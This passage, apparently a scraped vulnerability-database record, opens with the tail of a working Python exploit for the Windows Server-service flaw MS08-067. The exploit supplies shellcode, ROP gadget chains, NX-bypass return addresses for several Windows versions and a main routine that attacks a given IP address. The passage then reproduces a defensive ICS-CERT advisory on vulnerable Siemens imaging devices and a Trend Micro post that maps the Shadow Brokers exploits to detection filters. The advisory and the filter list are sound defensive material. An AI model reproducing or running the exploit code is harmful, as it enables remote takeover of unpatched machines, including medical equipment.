\"\\x2b\\xc9\\x83\\xe9\\xa7\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\"\r\nshellcode += \"\\x76\\x0e\\xb7\\xdd\\x9e\\xe0\\x83\\xee\\xfc\\xe2\\xf4\\x4b\\x35\"\r\nshellcode += \"\\x1c\\xe0\\xb7\\xdd\\xfe\\x69\\x52\\xec\\x5e\\x84\\x3c\\x8d\\xae\"\r\nshellcode += \"\\x6b\\xe5\\xd1\\x15\\xb2\\xa3\\x56\\xec\\xc8\\xb8\\x6a\\xd4\\xc6\"\r\nshellcode += \"\\x86\\x22\\x32\\xdc\\xd6\\xa1\\x9c\\xcc\\x97\\x1c\\x51\\xed\\xb6\"\r\nshellcode += \"\\x1a\\x7c\\x12\\xe5\\x8a\\x15\\xb2\\xa7\\x56\\xd4\\xdc\\x3c\\x91\"\r\nshellcode += \"\\x8f\\x98\\x54\\x95\\x9f\\x31\\xe6\\x56\\xc7\\xc0\\xb6\\x0e\\x15\"\r\nshellcode += \"\\xa9\\xaf\\x3e\\xa4\\xa9\\x3c\\xe9\\x15\\xe1\\x61\\xec\\x61\\x4c\"\r\nshellcode += \"\\x76\\x12\\x93\\xe1\\x70\\xe5\\x7e\\x95\\x41\\xde\\xe3\\x18\\x8c\"\r\nshellcode += \"\\xa0\\xba\\x95\\x53\\x85\\x15\\xb8\\x93\\xdc\\x4d\\x86\\x3c\\xd1\"\r\nshellcode += \"\\xd5\\x6b\\xef\\xc1\\x9f\\x33\\x3c\\xd9\\x15\\xe1\\x67\\x54\\xda\"\r\nshellcode += \"\\xc4\\x93\\x86\\xc5\\x81\\xee\\x87\\xcf\\x1f\\x57\\x82\\xc1\\xba\"\r\nshellcode += \"\\x3c\\xcf\\x75\\x6d\\xea\\xb5\\xad\\xd2\\xb7\\xdd\\xf6\\x97\\xc4\"\r\nshellcode += \"\\xef\\xc1\\xb4\\xdf\\x91\\xe9\\xc6\\xb0\\x22\\x4b\\x58\\x27\\xdc\"\r\nshellcode += \"\\x9e\\xe0\\x9e\\x19\\xca\\xb0\\xdf\\xf4\\x1e\\x8b\\xb7\\x22\\x4b\"\r\nshellcode += \"\\x8a\\xb2\\xb5\\x5e\\x48\\xa9\\x90\\xf6\\xe2\\xb7\\xdc\\x25\\x69\"\r\nshellcode += \"\\x51\\x8d\\xce\\xb0\\xe7\\x9d\\xce\\xa0\\xe7\\xb5\\x74\\xef\\x68\"\r\nshellcode += \"\\x3d\\x61\\x35\\x20\\xb7\\x8e\\xb6\\xe0\\xb5\\x07\\x45\\xc3\\xbc\"\r\nshellcode += \"\\x61\\x35\\x32\\x1d\\xea\\xea\\x48\\x93\\x96\\x95\\x5b\\x35\\xff\"\r\nshellcode += \"\\xe0\\xb7\\xdd\\xf4\\xe0\\xdd\\xd9\\xc8\\xb7\\xdf\\xdf\\x47\\x28\"\r\nshellcode += \"\\xe8\\x22\\x4b\\x63\\x4f\\xdd\\xe0\\xd6\\x3c\\xeb\\xf4\\xa0\\xdf\"\r\nshellcode += \"\\xdd\\x8e\\xe0\\xb7\\x8b\\xf4\\xe0\\xdf\\x85\\x3a\\xb3\\x52\\x22\"\r\nshellcode += \"\\x4b\\x73\\xe4\\xb7\\x9e\\xb6\\xe4\\x8a\\xf6\\xe2\\x6e\\x15\\xc1\"\r\nshellcode += \"\\x1f\\x62\\x5e\\x66\\xe0\\xca\\xff\\xc6\\x88\\xb7\\x9d\\x9e\\xe0\"\r\nshellcode += \"\\xdd\\xdd\\xce\\x88\\xbc\\xf2\\x91\\xd0\\x48\\x08\\xc9\\x88\\xc2\"\r\nshellcode += \"\\xb3\\xd3\\x81\\x48\\x08\\xc0\\xbe\\x48\\xd1\\xba\\x09\\xc6\\x22\"\r\nshellcode += \"\\x61\\x1f\\xb6\\x1e\\xb7\\x26\\xc2\\x1a\\x5d\\x5b\\x57\\xc0\\xb4\"\r\nshellcode += \"\\xea\\xdf\\x7b\\x0b\\x5d\\x2a\\x22\\x4b\\xdc\\xb1\\xa1\\x94\\x60\"\r\nshellcode += \"\\x4c\\x3d\\xeb\\xe5\\x0c\\x9a\\x8d\\x92\\xd8\\xb7\\x9e\\xb3\\x48\"\r\nshellcode += \"\\x08\\x9e\\xe0\"\r\n \r\nnonxjmper = \"\\x08\\x04\\x02\\x00%s\"+\"A\"*4+\"%s\"+\"A\"*42+\"\\x90\"*8+\"\\xeb\\x62\"+\"A\"*10\r\ndisableNXjumper = \"\\x08\\x04\\x02\\x00%s%s%s\"+\"A\"*28+\"%s\"+\"\\xeb\\x02\"+\"\\x90\"*2+\"\\xeb\\x62\"\r\nropjumper = \"\\x00\\x08\\x01\\x00\"+\"%s\"+\"\\x10\\x01\\x04\\x01\";\r\nmodule_base = 0x6f880000\r\ndef generate_rop(rvas):\r\n gadget1=\"\\x90\\x5a\\x59\\xc3\"\r\n gadget2 = [\"\\x90\\x89\\xc7\\x83\", \"\\xc7\\x0c\\x6a\\x7f\", \"\\x59\\xf2\\xa5\\x90\"] \r\n gadget3=\"\\xcc\\x90\\xeb\\x5a\" \r\n ret=struct.pack('<L', 0x00018000)\r\n ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)\r\n ret+=struct.pack('<L', 0x01040110)\r\n ret+=struct.pack('<L', 0x01010101)\r\n ret+=struct.pack('<L', 0x01010101)\r\n ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)\r\n ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)\r\n ret+=gadget1\r\n ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)\r\n ret+=struct.pack('<L', rvas['jmp eax']+module_base)\r\n ret+=gadget2[0]\r\n ret+=gadget2[1]\r\n ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)\r\n ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)\r\n ret+=gadget2[2]\r\n ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)\r\n ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)\r\n ret+=struct.pack('<L', rvas['jmp eax']+module_base)\r\n ret+=gadget3 \r\n return ret\r\nclass SRVSVC_Exploit(Thread):\r\n \r\n def __init__(self, target, os, port=445):\r\n \r\n super(SRVSVC_Exploit, self).__init__()\r\n \r\n self.__port = port\r\n \r\n self.target = target\r\n self.os = os\r\n \r\n \r\n def __DCEPacket(self):\r\n if (self.os=='1'):\r\n print 'Windows XP SP0/SP1 Universal\\n'\r\n ret = \"\\x61\\x13\\x00\\x01\"\r\n jumper = nonxjmper % (ret, ret)\r\n elif (self.os=='2'):\r\n print 'Windows 2000 Universal\\n'\r\n ret = \"\\xb0\\x1c\\x1f\\x00\"\r\n jumper = nonxjmper % (ret, ret)\r\n elif (self.os=='3'):\r\n print 'Windows 2003 SP0 Universal\\n'\r\n ret = \"\\x9e\\x12\\x00\\x01\" #0x01 00 12 9e\r\n jumper = nonxjmper % (ret, ret)\r\n elif (self.os=='4'):\r\n print 'Windows 2003 SP1 English\\n'\r\n ret_dec = \"\\x8c\\x56\\x90\\x7c\" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL\r\n ret_pop = \"\\xf4\\x7c\\xa2\\x7c\" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL\r\n jmp_esp = \"\\xd3\\xfe\\x86\\x7c\" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL\r\n disable_nx = \"\\x13\\xe4\\x83\\x7c\" #0x 7c 83 e4 13 NX disable @NTDLL.DLL\r\n jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)\r\n elif (self.os=='5'):\r\n print 'Windows XP SP3 French (NX)\\n'\r\n ret = \"\\x07\\xf8\\x5b\\x59\" #0x59 5b f8 07 \r\n disable_nx = \"\\xc2\\x17\\x5c\\x59\" #0x59 5c 17 c2 \r\n jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.\r\n elif (self.os=='6'):\r\n print 'Windows XP SP3 English (NX)\\n'\r\n ret = \"\\x07\\xf8\\x88\\x6f\" #0x6f 88 f8 07 \r\n disable_nx = \"\\xc2\\x17\\x89\\x6f\" #0x6f 89 17 c2 \r\n jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.\r\n elif (self.os=='7'):\r\n print 'Windows XP SP3 English (AlwaysOn NX)\\n'\r\n rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}\r\n jumper = generate_rop(rvasets)+\"AB\" #the nonxjmper also work in this case.\r\n else:\r\n print 'Not supported OS version\\n'\r\n sys.exit(-1)\r\n print '[-]Initiating connection'\r\n \r\n self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\r\n \r\n self.__trans.connect()\r\n \r\n print '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % self.target\r\n \r\n self.__dce = self.__trans.DCERPC_class(self.__trans)\r\n \r\n self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\r\n \r\n \r\n \r\n \r\n path =\"\\x5c\\x00\"+\"ABCDEFGHIJ\"*10 + shellcode +\"\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\" + \"\\x41\\x00\\x42\\x00\\x43\\x00\\x44\\x00\\x45\\x00\\x46\\x00\\x47\\x00\" + jumper + \"\\x00\" * 2\r\n \r\n server=\"\\xde\\xa4\\x98\\xc5\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x41\\x00\\x42\\x00\\x43\\x00\\x44\\x00\\x45\\x00\\x46\\x00\\x47\\x00\\x00\\x00\"\r\n prefix=\"\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\"\r\n \r\n self.__stub=server+\"\\x36\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x01\\x00\\x00\" + path +\"\\xE8\\x03\\x00\\x00\"+prefix+\"\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \r\n return\r\n \r\n \r\n \r\n def run(self):\r\n \r\n self.__DCEPacket()\r\n \r\n self.__dce.call(0x1f, self.__stub) \r\n time.sleep(5)\r\n print 'Exploit finish\\n'\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n try:\r\n \r\n target = sys.argv[1]\r\n os = sys.argv[2]\r\n \r\n except IndexError:\r\n \r\n print '\\nUsage: %s <target ip>\\n' % sys.argv[0]\r\n \r\n print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\\n'\r\n print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\\n'\r\n \r\n sys.exit(-1)\r\n \r\n \r\n \r\ncurrent = SRVSVC_Exploit(target, os)\r\n \r\ncurrent.start()\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25383"}], "ics": [{"lastseen": "2019-10-23T22:47:23", "bulletinFamily": "info", "description": "## OVERVIEW\n\nSiemens has identified two vulnerabilities in Siemens\u2019 Molecular Imaging products running on Windows XP. Siemens is preparing updates for the affected products.\n\nThese vulnerabilities could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nSiemens reports that the vulnerability affects the following products:\n\n * Siemens PET/CT Systems: All Windows XP-based versions,\n * Siemens SPECT/CT Systems: All Windows XP-based versions,\n * Siemens SPECT Systems: All Windows XP-based versions, and\n * Siemens SPECT Workplaces/Symbia.net: All Windows XP-based versions.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities may allow the attacker to remotely execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment and specific clinical usage.\n\n## BACKGROUND\n\nSiemens is an international company headquartered in Munich, Germany.\n\nThe affected products, Select Molecular Imaging products, are used in medical imaging. According to Siemens, Molecular Imaging products are deployed across the Healthcare and Public Health sector. Siemens estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION')a\n\nAn unauthenticated remote attacker could execute arbitrary code via a specially crafted remote procedure call (RPC) request sent to the server service of affected Microsoft Windows systems.\n\nCVE-2008-4250b has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).c\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERd\n\nAn unauthenticated remote attacker could execute arbitrary code with the permissions of the web server by sending a specially crafted HTTP request to the WebDAV service.\n\nCVE-2017-7269e has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).f\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these vulnerabilities.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nSiemens is preparing updates for the affected products and recommends protecting network access to the Molecular Imaging products with appropriate mechanisms. It is advised to run the devices in a dedicated network segment and protected IT environment. If this is not possible, Siemens recommends the following:\n\n * If patient safety and treatment is not at risk, disconnect the product from the network and use in standalone mode.\n * Reconnect the product only after the provided patch or remediation is installed on the system. Siemens is able to patch systems capable of Remote Update Handling (RUH) much faster by remote software distribution compared to onsite visits. Therefore users of RUH-capable equipment are recommended to clarify the situation concerning patch availability and remaining risk in the local customer network with the Siemens Customer Care Center first and then to reconnect the systems in order to receive patches as quickly as possible via RUH. This ensures smooth and fast receipt of updates and therefore supports reestablishment of system operations.\n\nIn addition, Siemens recommends:\n\n * Ensure users have appropriate backups and system restoration procedures.\n * For specific patch and remediation guidance information contact a local Siemens customer service engineer or a Siemens regional support center.\n\nFor more information on these vulnerabilities and more detailed mitigation instructions, please see Siemens Security Advisory SSA-814457 at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all medical devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate all medical devices and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for security recommended practices on the ICS-CERT web page at http://ics-cert.us-cert.gov/content/recommended-practices. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-94: Improper Control of Generation of Code ('Code Injection'), http://cwe.mitre.org/data/definitions/94.html, web site last accessed August 03, 2017.\n * b. NVD, https://nvd.nist.gov/vuln/detail/CVE-2008-4250, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * c. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed August 03, 2017.\n * d. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed August 03, 2017.\n * e. NVD, https://nvd.nist.gov/vuln/detail/CVE-2017-7269, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * f. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed August 03, 2017.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2017-08-03T00:00:00", "published": "2017-08-03T00:00:00", "id": "ICSMA-17-215-01", "href": "https://www.us-cert.gov//ics/advisories/ICSMA-17-215-01", "title": "Siemens Molecular Imaging Vulnerabilities", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-05-01T13:42:31", "bulletinFamily": "blog", "description": "\n\nI\u2019ve never been one to adopt the latest fashion trends, aside from what I wore growing up in the 1980s. I wore shoulder pads, blue eyeliner, designer jeans, and even parachute pants. While I continue to rock my 80s hair to this day, other trends I thought were long gone are making a comeback. (Shoulder pads \u2013 seriously?) History tends to repeat itself \u2013 what\u2019s old is new again \u2013 and it\u2019s no different in the security world.\n\n \n\nLast weekend, a group known as \u201cShadow Brokers\u201d released a large set of tools that can exploit flaws in several versions of Microsoft products and other platforms. A number of the exploits have CVEs that date as far back as 2001. In fact, one of the exploits named \u201cEwokFrenzy\u201d was discovered through our Zero Day Initiative over 10 years ago. Customers with TippingPoint solutions have had coverage for EwokFrenzy through Digital Vaccine\u00ae (DV) filter 4033 since **January 2006!**\n\nOur TippingPoint DVLabs team continues to review the contents associated with the Shadow Brokers disclosure to recommend coverage for TippingPoint solutions. The following table includes the DV filters that provide protection, including new filters released in an out-of-band release this week:\n\n** Exploit Name** | ** MS Bulletin** | ** CVE/ZDI** | ** Filters** | ** 0day?** | ** Status** \n---|---|---|---|---|--- \nDoublePulsar \n(Payload) | | | *27935 | N/A | Policy Filter \nEarlyShovel | | | *27938 | Unknown | Detects Exploit \nEasyBee** | | CVE-2007-1675 \nZDI-07-011 | | No | Investigating \nEasyPi | | | | Unknown | Investigating \nEbbisLand | | CVE-2001-0236 | 621, 622, 3512, 3791 | No | Investigating \nEchoWrecker | | CVE-2003-0201 | 1676 | No | Investigating \nEclipsedWing | MS08-067 | CVE-2008-4250 | 6515 | No | Detects Exploit \nEducatedScholar | MS09-050 | | 8465 | No | Detects Exploit \nELV | MS06-040 | CVE-2006-3439 | 9317 | No | Detects Exploit \nEmeraldThread | MS10-061 | | 10458, *27939 | No | Detects Exploit \nEmphasisMine | | | | Unknown | Investigating \nEnglishManDentist | | | | Unknown | Investigating \nErraticGopher | | | *27932 | Yes | Detects Exploit \nESKE | | CVE-2003-0352 | | No | Investigating \nEskimoRoll | MS14-068 | CVE-2014-6324 | *27940 | No | Exploit Unfilterable \nPolicy Filter \nEsteemAudit | | | *27933 | Yes | Detects Exploit \nEternalBlue | MS17-010 | | 27433, 27711, *27928 | No | Detects Exploit \nEternalChampion | MS17-010 | CVE-2017-0146 | 27433, 27711, *27929 | No | Detects Exploit \nEternalRomance | MS17-010 | | | No | Investigating \nEternalSynergy | MS17-010 | CVE-2017-0714 | *27937 | No | Detects Exploit \nEtre | | | | No | Investigating \nEVFR | | CVE-2003-0109 | 1612 | No | Detects Exploit \nEwokFrenzy | | CVE-2007-1675 \nZDI-07-011 | 4033 | No | Detects Exploit \nExplodingCan | | CVE-2017-7269 | 27643 | No | Detects Exploit \n* New DV filter \n**Identical to EwokFrenzy, but exploit untested against filter \n \n \n\n[Click here](<https://success.trendmicro.com/solution/1117192>) for more information on Trend Micro\u2019s response and recommendations for coverage across all Trend Micro products.\n\n**Adobe Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe Security Bulletins released on or before April 6, 2017.The following table maps Digital Vaccine filters to the Adobe updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s Adobe security updates from Dustin Childs\u2019 [April 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/4/11/the-april-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB17-10 | CVE-2017-3058 | 27698 | \nAPSB17-10 | CVE-2017-3059 | *27697 | \nAPSB17-10 | CVE-2017-3060 | 27832 | \nAPSB17-10 | CVE-2017-3061 | 27833 | \nAPSB17-10 | CVE-2017-3062 | *27533 | \nAPSB17-10 | CVE-2017-3063 | *27534 | \nAPSB17-10 | CVE-2017-3064 | 27836 | \nAPSB17-11 | CVE-2017-3013 | 27923, 27925 | \nAPSB17-11 | CVE-2017-3014 | 27824 | \nAPSB17-11 | CVE-2017-3017 | 27827 | \nAPSB17-11 | CVE-2017-3019 | *26521 | \nAPSB17-11 | CVE-2017-3020 | *26491 | \nAPSB17-11 | CVE-2017-3021 | *26510 | \nAPSB17-11 | CVE-2017-3022 | *26631 | \nAPSB17-11 | CVE-2017-3023 | *26535 | \nAPSB17-11 | CVE-2017-3024 | 27829 | \nAPSB17-11 | CVE-2017-3025 | 27851 | \nAPSB17-11 | CVE-2017-3026 | 27852 | \nAPSB17-11 | CVE-2017-3027 | 27909 | \nAPSB17-11 | CVE-2017-3028 | *27160 | \nAPSB17-11 | CVE-2017-3029 | *27159 | \nAPSB17-11 | CVE-2017-3030 | 27823 | \nAPSB17-11 | CVE-2017-3031 | *27241, *27260 | \nAPSB17-11 | CVE-2017-3032 | *27158 | \nAPSB17-11 | CVE-2017-3033 | *27261 | \nAPSB17-11 | CVE-2017-3034 | *27225 | \nAPSB17-11 | CVE-2017-3035 | *27236 | \nAPSB17-11 | CVE-2017-3036 | *27304 | \nAPSB17-11 | CVE-2017-3037 | 27849 | \nAPSB17-11 | CVE-2017-3038 | 27908 | \nAPSB17-11 | CVE-2017-3039 | 27905 | \nAPSB17-11 | CVE-2017-3041 | 27903 | \nAPSB17-11 | CVE-2017-3043 | N/A | Local Vulnerability \nAPSB17-11 | CVE-2017-3042 | *27554, *27556, *27557, *27811 | \nAPSB17-11 | CVE-2017-3044 | 27914 | \nAPSB17-11 | CVE-2017-3045 | 27915 | \nAPSB17-11 | CVE-2017-3046 | 27916 | \nAPSB17-11 | CVE-2017-3047 | 27919 | \nAPSB17-11 | CVE-2017-3048 | *27750 | \nAPSB17-11 | CVE-2017-3049 | 27922 | \nAPSB17-11 | CVE-2017-3050 | *27808 | \nAPSB17-11 | CVE-2017-3051 | *27749 | \nAPSB17-11 | CVE-2017-3052 | *27748 | \nAPSB17-11 | CVE-2017-3053 | *27704 | \nAPSB17-11 | CVE-2017-3054 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3055 | *27522 | \nAPSB17-11 | CVE-2017-3056 | *27520 | \nAPSB17-11 | CVE-2017-3057 | *27521 | \nAPSB17-11 | CVE-2017-3011 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3012 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3015 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3018 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3039 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3040 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3065 | N/A | Insufficient Information \n \n \n\n**Zero-Day Filters**\n\nThere are 13 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (10)_**\n\n| \n\n * 27812: ZDI-CAN-4572: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27820: ZDI-CAN-4571: Zero Day Initiative Vulnerability (Adobe Acrobat Reader DC)\n * 27821: ZDI-CAN-4570: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27822: ZDI-CAN-4569: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27832: HTTP: Adobe Flash length Memory Corruption Vulnerability (ZDI-17-247, ZDI-17-248)\n * 27914: HTTP: Adobe Acrobat Pro DC JPEG2000 Buffer Overflow Vulnerability (ZDI-17-267)\n * 27915: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-268)\n * 27916: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-270)\n * 27919: HTTP: Adobe Acrobat Pro DC Annotations Use-After-Free Vulnerability (ZDI-17-271)\n * 27922: HTTP: Adobe Acrobat Pro DC ImageConversion Buffer Overflow Vulnerability (ZDI-17-273)**_ _** \n---|--- \n| \n \n**_Cisco (1)_**\n\n| \n\n * 27807: ZDI-CAN-4635: Zero Day Initiative Vulnerability (Cisco License Manager Server) \n---|--- \n| \n \n**_MIcrosoft (1)_**\n\n| \n\n * 27810: ZDI-CAN-4573: Zero Day Initiative Vulnerability (Microsoft Internet Explorer)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 27804: ZDI-CAN-4638-4639: Zero Day Initiative Vulnerability (Trend Micro Control Manager)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-10-2017/>).", "modified": "2017-04-21T18:23:45", "published": "2017-04-21T18:23:45", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-17-2017/", "id": "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of April 17, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
